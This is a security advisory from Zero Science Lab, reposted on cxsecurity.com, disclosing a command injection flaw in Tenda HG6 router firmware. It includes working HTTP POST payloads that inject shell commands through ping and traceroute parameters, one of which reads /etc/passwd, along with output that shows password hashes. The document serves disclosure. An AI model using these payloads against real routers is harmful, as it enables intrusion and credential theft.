Tenda HG6 3.3.0 Remote Command Injection

Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces. Tested on: Boa/0.93.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php 22.04.2022 -- ping.asp: --------- POST /boaform/formPing HTTP/1.1 Host: pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564 --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf ping6.asp: ---------- POST /boaform/formPing6 HTTP/1.1 Host: pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp --- boa.conf web tracert.asp: ------------ POST /boaform/formTracert HTTP/1.1 Host: traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp --- /home/httpd tracert6.asp: ------------- POST /boaform/formTracert6 HTTP/1.1 Host: traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com


Back to Top